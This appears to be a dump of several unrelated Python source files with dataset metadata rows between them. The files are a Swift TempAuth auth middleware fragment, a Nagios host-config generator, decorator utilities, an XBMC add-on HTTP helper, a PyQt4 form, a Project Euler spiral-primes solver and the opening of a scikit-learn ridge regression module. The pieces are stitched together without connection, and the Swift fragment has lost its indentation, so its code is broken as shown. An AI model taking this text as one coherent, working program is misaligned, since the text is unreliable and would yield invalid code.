if '.reseller_admin' in user_groups and \
account != self.reseller_prefix and \
account[len(self.reseller_prefix)] != '.':
req.environ['swift_owner'] = True
return None
if account in user_groups and \
(req.method not in ('DELETE', 'PUT') or container):
# If the user is admin for the account and is not trying to do an
# account DELETE or PUT...
req.environ['swift_owner'] = True
return None
if (req.environ.get('swift_sync_key') and
req.environ['swift_sync_key'] ==
req.headers.get('x-container-sync-key', None) and
'x-timestamp' in req.headers and
(req.remote_addr in self.allowed_sync_hosts or
get_remote_client(req) in self.allowed_sync_hosts)):
return None
referrers, groups = parse_acl(getattr(req, 'acl', None))
if referrer_allowed(req.referer, referrers):
if obj or '.rlistings' in groups:
return None
return self.denied_response(req)
if not req.remote_user:
return self.denied_response(req)
for user_group in user_groups:
if user_group in groups:
return None
return self.denied_response(req)
def denied_response(self, req):
"""
Returns a standard WSGI response callable with the status of 403 or 401
depending on whether the REMOTE_USER is set or not.
"""
if req.remote_user:
return HTTPForbidden(request=req)
else:
return HTTPUnauthorized(request=req)
def handle(self, env, start_response):
"""
WSGI entry point for auth requests (ones that match the
self.auth_prefix).
Wraps env in webob.Request object and passes it down.
:param env: WSGI environment dictionary
:param start_response: WSGI callable
"""
try:
req = Request(env)
if self.auth_prefix:
req.path_info_pop()
req.bytes_transferred = '-'
req.client_disconnect = False
if 'x-storage-token' in req.headers and \
'x-auth-token' not in req.headers:
req.headers['x-auth-token'] = req.headers['x-storage-token']
if 'eventlet.posthooks' in env:
env['eventlet.posthooks'].append(
(self.posthooklogger, (req,), {}))
return self.handle_request(req)(env, start_response)
else:
# Lack of posthook support means that we have to log on the
# start of the response, rather than after all the data has
# been sent. This prevents logging client disconnects
# differently than full transmissions.
response = self.handle_request(req)(env, start_response)
self.posthooklogger(env, req)
return response
except (Exception, Timeout):
print "EXCEPTION IN handle: %s: %s" % (format_exc(), env)
start_response('500 Server Error',
[('Content-Type', 'text/plain')])
return ['Internal server error.\n']
def handle_request(self, req):
"""
Entry point for auth requests (ones that match the self.auth_prefix).
Should return a WSGI-style callable (such as webob.Response).
:param req: webob.Request object
"""
req.start_time = time()
handler = None
try:
version, account, user, _junk = split_path(req.path_info,
minsegs=1, maxsegs=4, rest_with_last=True)
except ValueError:
return HTTPNotFound(request=req)
if version in ('v1', 'v1.0', 'auth'):
if req.method == 'GET':
handler = self.handle_get_token
if not handler:
req.response = HTTPBadRequest(request=req)
else:
req.response = handler(req)
return req.response
def handle_get_token(self, req):
"""
Handles the various `request for token and service end point(s)` calls.
There are various formats to support the various auth servers in the
past. Examples::
GET <auth-prefix>/v1/<act>/auth
X-Auth-User: <act>:<usr> or X-Storage-User: <usr>
X-Auth-Key: <key> or X-Storage-Pass: <key>
GET <auth-prefix>/auth
X-Auth-User: <act>:<usr> or X-Storage-User: <act>:<usr>
X-Auth-Key: <key> or X-Storage-Pass: <key>
GET <auth-prefix>/v1.0
X-Auth-User: <act>:<usr> or X-Storage-User: <act>:<usr>
X-Auth-Key: <key> or X-Storage-Pass: <key>
On successful authentication, the response will have X-Auth-Token and
X-Storage-Token set to the token to use with Swift and X-Storage-URL
set to the URL to the default Swift cluster to use.
:param req: The webob.Request to process.
:returns: webob.Response, 2xx on success with data set as explained
above.
"""
# Validate the request info
try:
pathsegs = split_path(req.path_info, minsegs=1, maxsegs=3,
rest_with_last=True)
except ValueError:
return HTTPNotFound(request=req)
if pathsegs[0] == 'v1' and pathsegs[2] == 'auth':
account = pathsegs[1]
user = req.headers.get('x-storage-user')
if not user:
user = req.headers.get('x-auth-user')
if not user or ':' not in user:
return HTTPUnauthorized(request=req)
account2, user = user.split(':', 1)
if account != account2:
return HTTPUnauthorized(request=req)
key = req.headers.get('x-storage-pass')
if not key:
key = req.headers.get('x-auth-key')
elif pathsegs[0] in ('auth', 'v1.0'):
user = req.headers.get('x-auth-user')
if not user:
user = req.headers.get('x-storage-user')
if not user or ':' not in user:
return HTTPUnauthorized(request=req)
account, user = user.split(':', 1)
key = req.headers.get('x-auth-key')
if not key:
key = req.headers.get('x-storage-pass')
else:
return HTTPBadRequest(request=req)
if not all((account, user, key)):
return HTTPUnauthorized(request=req)
# Authenticate user
account_user = account + ':' + user
if account_user not in self.users:
return HTTPUnauthorized(request=req)
if self.users[account_user]['key'] != key:
return HTTPUnauthorized(request=req)
# Get memcache client
memcache_client = cache_from_env(req.environ)
if not memcache_client:
raise Exception('Memcache required')
# See if a token already exists and hasn't expired
token = None
memcache_user_key = '%s/user/%s' % (self.reseller_prefix, account_user)
candidate_token = memcache_client.get(memcache_user_key)
if candidate_token:
memcache_token_key = \
'%s/token/%s' % (self.reseller_prefix, candidate_token)
cached_auth_data = memcache_client.get(memcache_token_key)
if cached_auth_data:
expires, groups = cached_auth_data
if expires > time():
token = candidate_token
# Create a new token if one didn't exist
if not token:
# Generate new token
token = '%stk%s' % (self.reseller_prefix, uuid4().hex)
expires = time() + self.token_life
groups = [account, account_user]
groups.extend(self.users[account_user]['groups'])
if '.admin' in groups:
groups.remove('.admin')
account_id = self.users[account_user]['url'].rsplit('/', 1)[-1]
groups.append(account_id)
groups = ','.join(groups)
# Save token
memcache_token_key = '%s/token/%s' % (self.reseller_prefix, token)
memcache_client.set(memcache_token_key, (expires, groups),
timeout=float(expires - time()))
# Record the token with the user info for future use.
memcache_user_key = \
'%s/user/%s' % (self.reseller_prefix, account_user)
memcache_client.set(memcache_user_key, token,
timeout=float(expires - time()))
return Response(request=req,
headers={'x-auth-token': token, 'x-storage-token': token,
'x-storage-url': self.users[account_user]['url']})
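    # Illustrative client call for the handler above (host, port and the test
    # credentials are assumptions taken from the sample config in the class
    # docstring):
    #   curl -i http://127.0.0.1:8080/auth/v1.0 \
    #        -H 'X-Auth-User: test:tester' -H 'X-Auth-Key: testing'
    # A 2xx response carries X-Auth-Token, X-Storage-Token and X-Storage-Url.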
def posthooklogger(self, env, req):
if not req.path.startswith(self.auth_prefix):
return
response = getattr(req, 'response', None)
if not response:
return
trans_time = '%.4f' % (time() - req.start_time)
the_request = quote(unquote(req.path))
if req.query_string:
the_request = the_request + '?' + req.query_string
# remote user for zeus
client = req.headers.get('x-cluster-client-ip')
if not client and 'x-forwarded-for' in req.headers:
# remote user for other lbs
client = req.headers['x-forwarded-for'].split(',')[0].strip()
logged_headers = None
if self.log_headers:
logged_headers = '\n'.join('%s: %s' % (k, v)
for k, v in req.headers.items())
status_int = response.status_int
if getattr(req, 'client_disconnect', False) or \
getattr(response, 'client_disconnect', False):
status_int = 499
self.logger.info(' '.join(quote(str(x)) for x in (client or '-',
req.remote_addr or '-', strftime('%d/%b/%Y/%H/%M/%S', gmtime()),
req.method, the_request, req.environ['SERVER_PROTOCOL'],
status_int, req.referer or '-', req.user_agent or '-',
req.headers.get('x-auth-token',
req.headers.get('x-auth-admin-user', '-')),
getattr(req, 'bytes_transferred', 0) or '-',
getattr(response, 'bytes_transferred', 0) or '-',
req.headers.get('etag', '-'),
req.environ.get('swift.trans_id', '-'), logged_headers or '-',
trans_time)))
def filter_factory(global_conf, **local_conf):
"""Returns a WSGI filter app for use with paste.deploy."""
conf = global_conf.copy()
conf.update(local_conf)
def auth_filter(app):
return TempAuth(app, conf)
return auth_filter
| apache-2.0 | -6,645,367,474,745,003,000 | 43.139004 | 79 | 0.560188 | false |
CanuxCheng/Nagios-Auto | nrobot/host/host.py | 1 | 9599 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
######################################################################
# Copyright C 2015 Faurecia (China) Holding Co.,Ltd. #
# All rights reserved #
# Name: host.py
# Author: Canux [email protected] #
# Version: V1.0 #
# Time: Thu 20 Aug 2015 02:27:23 AM EDT
######################################################################
# Description:
######################################################################
from base import NagiosAuto
import os
class Host(NagiosAuto):
"""This class have three options to create create host file in nagios.
You can specify the template you need.
If you create a lots of host file at one time, this is more effeciency.
"""
def __init__(self, *args, **kwargs):
"""Define some variables"""
super(Host, self).__init__(*args, **kwargs)
self.g_dir = self.args.path + "/hosts/"
self.host_conf = self.conf + "/host/"
self.area_conf = self.conf + "/area/"
self.area_list = ["as", "us", "eu"]
if self.__class__.__name__ == "Host":
self.logger.debug("==== END DEBUG ====")
def define_options(self):
"""Define some options used for create host."""
super(Host, self).define_options()
self.parser.add_argument("-t", "--types",
action="append",
dest="types",
required=False,
help="The host types, eg: ['ad', 'mii', \
'ijcore', 'mii_win-primary', 'mii_win-bck']. \
Read template from types.cfg and \
read hostname and ip address from types.txt. \
Use types@mode for normal host. \
mode=0 use dns as address. \
mode=1 use ip as address.")
self.parser.add_argument("-v", "--vcenter",
dest="vcenter",
required=False,
help="Vcenter for mii and ijcore vmware.")
def get_area(self, hostname):
"""Get the area us/eu/as according to hostname."""
try:
locate = hostname[0:2].upper()
self.logger.debug("locate: {}".format(locate))
for area in self.area_list:
area_file = self.area_conf + area + ".txt"
self.logger.debug("area_file: {}".format(area_file))
f = open(area_file, "r")
lines = f.readlines()
for line in lines:
if locate in line:
self.logger.debug("area: {}".format(area))
return area
self.not_exist(locate)
except Exception as e:
self.error("get_area: %s" % e)
def get_vcenter(self, vcenter):
"""Get the vcenter for vmware."""
try:
vcenterfile = self.area_conf + "vmware.txt"
self.logger.debug("vcenterfile: {}".format(vcenterfile))
fr = open(vcenterfile, "r")
lines = fr.readlines()
for line in lines:
if vcenter in line:
vcenter = "".join(line.split())
self.logger.debug("vcenter: {}".format(vcenter))
return vcenter
self.not_exist("%s" % vcenter)
except Exception as e:
self.error("get_vcenter: %s" % e)
def get_mii_site(self, hostname):
"""Get the for _MII_SITEDATABASE in mii primary or backup server."""
try:
mii_site = hostname[2:5].upper()
self.logger.debug("mii_site: {}".format(mii_site))
return mii_site
except Exception as e:
self.error("get_mii_site: %s" % e)
def get_types(self, types):
try:
if types in ["ad", "mii_win-primary", "mii_win-bck"]:
types = types
mode = 1
elif types in ["mii", "ijcore"]:
types = types
mode = 0
else:
old_type = types
types = old_type.split("@")[0]
mode = old_type.split("@")[1]
if not mode:
self.error("Please specify address mode for normal host.")
self.logger.debug("types: {}".format(types))
self.logger.debug("mode: {}".format(mode))
return types, mode
except Exception as e:
self.error("get_types: %s" % e)
def write_one_host(self, hostfile, lines, vcenter,
area, mii_site, hostname, address):
"""Write to one host file."""
try:
fw = open(hostfile, "w")
for l in lines:
self.logger.debug("l: {}".format(l))
if "ohtpl_area_%s" in l:
fw.write(l % area)
elif "ohtpl_sys_vmware_%s_%s" in l:
l_vcenter = l.replace("ohtpl_sys_vmware_%s_%s",
str(vcenter))
fw.write(l_vcenter)
elif "host_name" in l:
fw.write(l % hostname)
elif "address" in l:
fw.write(l % address)
elif "_MII_SITEDATABASE" in l:
fw.write(l % mii_site)
elif "%s" not in l:
fw.write(l)
                # A template line with an unrecognized %s placeholder cannot be handled.
                else:
                    self.error("write_one_host: unknown '%s' placeholder in template line.")
except Exception as e:
self.error("write_one_host: %s" % e)
def create_host(self):
"""Get types from -t and read hostname and address and write to the \
hosts in nagios."""
try:
vcenter = ""
area = ""
mii_site = ""
for loop in range(0, len(self.args.types)):
types = self.args.types[loop]
self.logger.debug("types: {}".format(types))
(types, mode) = self.get_types(types)
# Get the template file.
template = self.host_conf + types + ".cfg"
self.logger.debug("template: {}".format(template))
ftr = open(template, "r")
lines = ftr.readlines()
# Get the hostname and address file.
host = self.host_conf + types + ".txt"
self.logger.debug("host: {}".format(host))
des_host = self.host_conf + types + ".tmp"
self.logger.debug("des_host: {}".format(des_host))
self.delete_blank_line(host, des_host)
fhr = open(des_host, "r")
h_lines = fhr.readlines()
for line in h_lines:
hostname = line.split()[0].split(".")[0].strip().upper()
self.logger.debug("hostname: {}".format(hostname))
address = line.split()[int(mode)].strip().lower()
self.logger.debug("address: {}".format(address))
hostfile = self.g_dir + hostname + ".cfg"
self.logger.debug("hostfile: {}".format(hostfile))
if types in ["ad"]:
area = self.get_area(hostname)
elif types in ["mii_win-primary", "mii_win-bck"]:
area = self.get_area(hostname)
mii_site = self.get_mii_site(hostname)
elif types in ["mii", "ijcore"]:
if self.args.vcenter:
vcenter = self.get_vcenter(self.args.vcenter)
else:
self.error("Please use -v to specify vcenter.")
# Write to the host in nagios.
if os.path.isfile(hostfile):
self.already_exist("%s" % hostfile)
if self.args.force:
self.write_one_host(hostfile, lines, vcenter, area,
mii_site, hostname, address)
else:
self.write_one_host(hostfile, lines, vcenter, area,
mii_site, hostname, address)
except Exception as e:
self.error("create_host: %s" % e)
def delete_host(self):
files = self.host_conf + "host.txt"
self.logger.debug("files: {}".format(files))
des_files = self.host_conf + "host.tmp"
self.logger.debug("des_files: {}".format(des_files))
self.delete_blank_line(files, des_files)
self.fr = open(des_files, "r")
self.lines = self.fr.readlines()
for line in self.lines:
self.logger.debug("line: {}".format(line))
hostname = line.split()[0].split(".")[0].strip().upper()
hostfile = self.g_dir + hostname + ".cfg"
self.logger.debug("hostfile: {}".format(hostfile))
if not os.path.isfile(hostfile):
self.not_exist("%s" % hostfile)
else:
try:
os.remove(hostfile)
except Exception as e:
self.error("remove_host: %s" % e)
| bsd-3-clause | -2,004,714,789,927,656,400 | 42.238739 | 79 | 0.449213 | false |
radomd92/botjagwar | api/decorator.py | 1 | 3279 | import datetime
import multiprocessing
import threading
import time
def critical_section(cs_lock: threading.Lock):
"""
    Decorator that acquires the specified lock when entering the decorated
    function and releases it when leaving.
:param cs_lock:
:return:
"""
def _critical_section(f):
def _critical_section_wrapper(*args, **kwargs):
            with cs_lock:  # ensures the lock is released even if f raises
                ret = f(*args, **kwargs)
            return ret
return _critical_section_wrapper
return _critical_section
class run_once(object):
"""
Decorator for run-once methods
"""
__slots__ = ("func", "result", "methods")
def __init__(self, func):
self.func = func
def __call__(self, *args, **kw):
try:
return self.result
except AttributeError:
self.result = self.func(*args, **kw)
return self.result
def __get__(self, instance, cls):
method = self.func.__get__(instance, cls)
try:
return self.methods[method]
except (AttributeError,KeyError):
decorated = run_once(method)
try:
self.methods[method] = decorated
except AttributeError:
self.methods = { method : decorated }
return decorated
def __eq__(self, other):
return isinstance(other, run_once) and other.func == self.func
def __hash__(self):
return hash(self.func)
def singleton(class_):
"""
Specify that a class is a singleton
:param class_:
:return:
"""
instances = {}
def getinstance(*args, **kwargs):
if class_ not in instances:
instances[class_] = class_(*args, **kwargs)
return instances[class_]
return getinstance
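# Usage sketch (the class is illustrative):
#   @singleton
#   class Config(object):
#       pass
#   assert Config() is Config()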
def threaded(f):
def wrap(*args, **kwargs):
t = threading.Thread(target=f, args=args, kwargs=kwargs)
t.daemon = False
t.start()
return wrap
def separate_process(f):
"""
    Run the function in a separate process.
:param f:
:return:
"""
def wrap(*args, **kwargs):
t = multiprocessing.Process(target=f, args=args, kwargs=kwargs)
t.start()
return wrap
def time_this(identifier='function'):
def _time_this(f):
def wrapper(*args, **kwargs):
t0 = datetime.datetime.now()
ret = f(*args, **kwargs)
t1 = datetime.datetime.now()
dt = t1 - t0
d = dt.seconds * 1000 + dt.microseconds / 1000
print(("%s took %2.6f seconds to execute" % (identifier, d/1000.)))
return ret
return wrapper
return _time_this
def retry_on_fail(exceptions, retries=5, time_between_retries=1):
def _retry_on_fail(f):
def wrapper(*args, **kwargs):
            m_retries = 0
            while True:  # retry until the call succeeds or retries run out
                try:
                    return f(*args, **kwargs)
                except tuple(exceptions) as e:
                    if m_retries < retries:
                        m_retries += 1
                        print('Error:', e, 'retry %d' % m_retries)
                        time.sleep(time_between_retries)
                    else:
                        raise e
return wrapper
return _retry_on_fail
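# Usage sketch (exception type, counts and the decorated function are illustrative):
#   @retry_on_fail([IOError], retries=3, time_between_retries=2)
#   def fetch_page(url):
#       ...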
| mit | -8,227,460,502,292,809,000 | 24.818898 | 92 | 0.548033 | false |
noba3/KoTos | addons/plugin.video.ntv/net.py | 1 | 10537 | '''
common XBMC Module
Copyright (C) 2011 t0mm0
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import cookielib
import gzip
import re
import StringIO
import urllib
import urllib2
import socket
#Set Global timeout - Useful for slow connections and Putlocker.
socket.setdefaulttimeout(30)
class HeadRequest(urllib2.Request):
'''A Request class that sends HEAD requests'''
def get_method(self):
return 'HEAD'
class Net:
'''
This class wraps :mod:`urllib2` and provides an easy way to make http
requests while taking care of cookies, proxies, gzip compression and
character encoding.
Example::
from t0mm0.common.net import Net
net = Net()
response = net.http_GET('http://xbmc.org')
print response.content
'''
_cj = cookielib.LWPCookieJar()
_proxy = None
import xbmcaddon
PLUGIN='plugin.video.ntv'
ADDON = xbmcaddon.Addon(id=PLUGIN)
streamtype = ADDON.getSetting('streamtype')
if streamtype == '0':
STREAMTYPE = 'NTV-XBMC-HLS-'
elif streamtype == '1':
STREAMTYPE = 'NTV-XBMC-'
_user_agent = STREAMTYPE + ADDON.getAddonInfo('version')
_http_debug = False
def __init__(self, cookie_file='', proxy='', user_agent='',
http_debug=False):
'''
Kwargs:
cookie_file (str): Full path to a file to be used to load and save
cookies to.
proxy (str): Proxy setting (eg.
``'http://user:[email protected]:1234'``)
user_agent (str): String to use as the User Agent header. If not
                supplied the class will use the add-on's default user agent.
http_debug (bool): Set ``True`` to have HTTP header info written to
the XBMC log for all requests.
'''
if cookie_file:
self.set_cookies(cookie_file)
if proxy:
self.set_proxy(proxy)
if user_agent:
self.set_user_agent(user_agent)
self._http_debug = http_debug
self._update_opener()
def set_cookies(self, cookie_file):
'''
Set the cookie file and try to load cookies from it if it exists.
Args:
cookie_file (str): Full path to a file to be used to load and save
cookies to.
'''
try:
self._cj.load(cookie_file, ignore_discard=True)
self._update_opener()
return True
except:
return False
def get_cookies(self):
'''Returns A dictionary containing all cookie information by domain.'''
return self._cj._cookies
def save_cookies(self, cookie_file):
'''
Saves cookies to a file.
Args:
cookie_file (str): Full path to a file to save cookies to.
'''
self._cj.save(cookie_file, ignore_discard=True)
def set_proxy(self, proxy):
'''
Args:
proxy (str): Proxy setting (eg.
``'http://user:[email protected]:1234'``)
'''
self._proxy = proxy
self._update_opener()
def get_proxy(self):
'''Returns string containing proxy details.'''
return self._proxy
def set_user_agent(self, user_agent):
'''
Args:
user_agent (str): String to use as the User Agent header.
'''
self._user_agent = user_agent
def get_user_agent(self):
'''Returns user agent string.'''
return self._user_agent
def _update_opener(self):
'''
Builds and installs a new opener to be used by all future calls to
:func:`urllib2.urlopen`.
'''
if self._http_debug:
http = urllib2.HTTPHandler(debuglevel=1)
else:
http = urllib2.HTTPHandler()
if self._proxy:
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self._cj),
urllib2.ProxyHandler({'http':
self._proxy}),
urllib2.HTTPBasicAuthHandler(),
http)
else:
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self._cj),
urllib2.HTTPBasicAuthHandler(),
http)
urllib2.install_opener(opener)
def http_GET(self, url, headers={}, compression=True):
'''
Perform an HTTP GET request.
Args:
url (str): The URL to GET.
Kwargs:
headers (dict): A dictionary describing any headers you would like
to add to the request. (eg. ``{'X-Test': 'testing'}``)
compression (bool): If ``True`` (default), try to use gzip
compression.
Returns:
An :class:`HttpResponse` object containing headers and other
meta-information about the page and the page content.
'''
return self._fetch(url, headers=headers, compression=compression)
def http_POST(self, url, form_data, headers={}, compression=True):
'''
Perform an HTTP POST request.
Args:
url (str): The URL to POST.
form_data (dict): A dictionary of form data to POST.
Kwargs:
headers (dict): A dictionary describing any headers you would like
to add to the request. (eg. ``{'X-Test': 'testing'}``)
compression (bool): If ``True`` (default), try to use gzip
compression.
Returns:
An :class:`HttpResponse` object containing headers and other
meta-information about the page and the page content.
'''
return self._fetch(url, form_data, headers=headers,
compression=compression)
def http_HEAD(self, url, headers={}):
'''
Perform an HTTP HEAD request.
Args:
url (str): The URL to GET.
Kwargs:
headers (dict): A dictionary describing any headers you would like
to add to the request. (eg. ``{'X-Test': 'testing'}``)
Returns:
An :class:`HttpResponse` object containing headers and other
meta-information about the page.
'''
req = HeadRequest(url)
req.add_header('User-Agent', self._user_agent)
for k, v in headers.items():
req.add_header(k, v)
response = urllib2.urlopen(req)
return HttpResponse(response)
def _fetch(self, url, form_data={}, headers={}, compression=True):
'''
Perform an HTTP GET or POST request.
Args:
url (str): The URL to GET or POST.
form_data (dict): A dictionary of form data to POST. If empty, the
request will be a GET, if it contains form data it will be a POST.
Kwargs:
headers (dict): A dictionary describing any headers you would like
to add to the request. (eg. ``{'X-Test': 'testing'}``)
compression (bool): If ``True`` (default), try to use gzip
compression.
Returns:
An :class:`HttpResponse` object containing headers and other
meta-information about the page and the page content.
'''
encoding = ''
req = urllib2.Request(url)
if form_data:
form_data = urllib.urlencode(form_data)
req = urllib2.Request(url, form_data)
req.add_header('User-Agent', self._user_agent)
for k, v in headers.items():
req.add_header(k, v)
if compression:
req.add_header('Accept-Encoding', 'gzip')
response = urllib2.urlopen(req)
return HttpResponse(response)
class HttpResponse:
'''
    This class represents a response from an HTTP request.
The content is examined and every attempt is made to properly encode it to
Unicode.
.. seealso::
:meth:`Net.http_GET`, :meth:`Net.http_HEAD` and :meth:`Net.http_POST`
'''
content = ''
    '''Unicode encoded string containing the body of the response.'''
def __init__(self, response):
'''
Args:
response (:class:`mimetools.Message`): The object returned by a call
to :func:`urllib2.urlopen`.
'''
self._response = response
html = response.read()
try:
if response.headers['content-encoding'].lower() == 'gzip':
html = gzip.GzipFile(fileobj=StringIO.StringIO(html)).read()
except:
pass
try:
content_type = response.headers['content-type']
if 'charset=' in content_type:
encoding = content_type.split('charset=')[-1]
except:
pass
r = re.search('<meta\s+http-equiv="Content-Type"\s+content="(?:.+?);' +
'\s+charset=(.+?)"', html, re.IGNORECASE)
if r:
encoding = r.group(1)
try:
html = unicode(html, encoding)
except:
pass
self.content = html
def get_headers(self):
'''Returns a List of headers returned by the server.'''
return self._response.info().headers
def get_url(self):
'''
Return the URL of the resource retrieved, commonly used to determine if
a redirect was followed.
'''
return self._response.geturl()
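# Illustrative use of the classes above (the URL is a placeholder):
#   resp = Net().http_GET('http://example.com',
#                         headers={'Referer': 'http://example.com'})
#   html = resp.content          # unicode body, gzip/charset handled above
#   final_url = resp.get_url()   # useful to detect redirects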
| gpl-2.0 | -4,163,256,744,423,435,000 | 30.174556 | 80 | 0.541425 | false |
LegoStormtroopr/canard | SQBLWidgets/sqblUI/logicNodeText.py | 1 | 3374 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui/logicNodeText.ui'
#
# Created: Sat Jul 25 12:16:46 2015
# by: PyQt4 UI code generator 4.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(534, 454)
self.verticalLayout = QtGui.QVBoxLayout(Form)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.label = QtGui.QLabel(Form)
self.label.setWordWrap(True)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout.addWidget(self.label)
self.targetRespondent = QtGui.QLineEdit(Form)
self.targetRespondent.setStyleSheet(_fromUtf8("margin-left:8px;"))
self.targetRespondent.setObjectName(_fromUtf8("targetRespondent"))
self.verticalLayout.addWidget(self.targetRespondent)
self.label_2 = QtGui.QLabel(Form)
self.label_2.setStyleSheet(_fromUtf8("margin-top:8px;"))
self.label_2.setWordWrap(True)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout.addWidget(self.label_2)
self.purpose = QtGui.QTextEdit(Form)
self.purpose.setStyleSheet(_fromUtf8("margin-left:8px;"))
self.purpose.setAcceptRichText(False)
self.purpose.setObjectName(_fromUtf8("purpose"))
self.verticalLayout.addWidget(self.purpose)
self.label_5 = QtGui.QLabel(Form)
self.label_5.setStyleSheet(_fromUtf8("margin-top:8px;"))
self.label_5.setWordWrap(True)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.verticalLayout.addWidget(self.label_5)
self.instruction = QtGui.QTextEdit(Form)
self.instruction.setStyleSheet(_fromUtf8("margin-left:8px;"))
self.instruction.setObjectName(_fromUtf8("instruction"))
self.verticalLayout.addWidget(self.instruction)
self.label_2.setBuddy(self.purpose)
self.label_5.setBuddy(self.instruction)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(QtGui.QApplication.translate("Form", "Form", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Form", "<html><head/><body><p><span style=\" font-weight:600;\">Target Respondent</span> - <span style=\" font-size:small;\">The people who this section is specifically trying to gather data from.</span></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("Form", "<html><head/><body><p><span style=\" font-weight:600;\">Purpose</span> - <small>Why are the people above identified and separated, and why are they being asked these questions.</small></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.label_5.setText(QtGui.QApplication.translate("Form", "<html><head/><body><p><span style=\" font-weight:600;\">Instruction</span> - <small>Extra text about this routing and sequencing that may be shown to a respondent depending on the final questionnaire.</small></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
| gpl-3.0 | -7,360,708,022,024,144,000 | 54.311475 | 334 | 0.698281 | false |
rodgzilla/project-euler | problem_058/problem.py | 1 | 1801 | def _try_composite(a, d, n, s):
if pow(a, d, n) == 1:
return False
for i in range(s):
if pow(a, 2**i * d, n) == n-1:
return False
return True # n is definitely composite
def is_prime(n, _precision_for_huge_n=16):
    if n in _known_primes:
        return True
    if n in (0, 1):
        return False
if any((n % p) == 0 for p in _known_primes):
return False
d, s = n - 1, 0
while not d % 2:
d, s = d >> 1, s + 1
# Returns exact according to http://primes.utm.edu/prove/prove2_3.html
if n < 1373653:
return not any(_try_composite(a, d, n, s) for a in (2, 3))
if n < 25326001:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5))
if n < 118670087467:
if n == 3215031751:
return False
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7))
if n < 2152302898747:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11))
if n < 3474749660383:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13))
if n < 341550071728321:
return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13, 17))
# otherwise
return not any(_try_composite(a, d, n, s)
for a in _known_primes[:_precision_for_huge_n])
def primes_on_border(n):
new_numbers = [(2 * n + 1) ** 2 - 2 * n,
(2 * n + 1) ** 2 - 4 * n,
(2 * n + 1) ** 2 - 6 * n]
return len([num for num in new_numbers if is_prime(num)])
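# Layer n of the number spiral has side length 2n + 1 and its corners are
# (2n+1)**2 - 2*n*k for k = 0, 1, 2, 3.  The k = 0 corner is a perfect square
# and can never be prime, which is why only three candidates are checked above.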
_known_primes = [2, 3]
_known_primes += [x for x in range(5, 1000, 2) if is_prime(x)]
total = 1
primes = 0
ratio = 1
i = 1
while ratio > 0.1:
total += 4
primes += primes_on_border(i)
ratio = primes / total
i += 1
print(2 * (i - 1) + 1)
| gpl-3.0 | -2,561,185,032,495,983,000 | 32.351852 | 84 | 0.514159 | false |
cdegroc/scikit-learn | sklearn/linear_model/ridge.py | 1 | 19134 | """
Ridge regression
"""
# Author: Mathieu Blondel <[email protected]>
# License: Simplified BSD
import numpy as np
from .base import LinearModel
from ..utils.extmath import safe_sparse_dot
from ..utils import safe_asarray
from ..preprocessing import LabelBinarizer
from ..grid_search import GridSearchCV
def _solve(A, b, solver, tol):
# helper method for ridge_regression, A is symmetric positive
if solver == 'auto':
if hasattr(A, 'todense'):
solver = 'sparse_cg'
else:
solver = 'dense_cholesky'
if solver == 'sparse_cg':
if b.ndim < 2:
from scipy.sparse import linalg as sp_linalg
sol, error = sp_linalg.cg(A, b, tol=tol)
if error:
raise ValueError("Failed with error code %d" % error)
return sol
else:
# sparse_cg cannot handle a 2-d b.
sol = []
for j in range(b.shape[1]):
sol.append(_solve(A, b[:, j], solver="sparse_cg", tol=tol))
return np.array(sol).T
elif solver == 'dense_cholesky':
from scipy import linalg
if hasattr(A, 'todense'):
A = A.todense()
return linalg.solve(A, b, sym_pos=True, overwrite_a=True)
else:
raise NotImplementedError('Solver %s not implemented' % solver)
def ridge_regression(X, y, alpha, sample_weight=1.0, solver='auto', tol=1e-3):
"""Solve the ridge equation by the method of normal equations.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or numpy array of shape [n_samples]
Individual weights for each sample
solver : {'auto', 'dense_cholesky', 'sparse_cg'}, optional
        Solver to use in the computational routines. 'dense_cholesky'
        will use the standard scipy.linalg.solve function, 'sparse_cg'
        will use a conjugate gradient solver as found in
        scipy.sparse.linalg.cg, while 'auto' will choose the most
        appropriate depending on the matrix X.
tol: float
Precision of the solution.
Returns
-------
coef: array, shape = [n_features] or [n_responses, n_features]
Weight vector(s).
Notes
-----
This function won't compute the intercept.
"""
n_samples, n_features = X.shape
is_sparse = False
if hasattr(X, 'todense'): # lazy import of scipy.sparse
from scipy import sparse
is_sparse = sparse.issparse(X)
if is_sparse:
if n_features > n_samples or \
isinstance(sample_weight, np.ndarray) or \
sample_weight != 1.0:
I = sparse.lil_matrix((n_samples, n_samples))
I.setdiag(np.ones(n_samples) * alpha * sample_weight)
c = _solve(X * X.T + I, y, solver, tol)
coef = X.T * c
else:
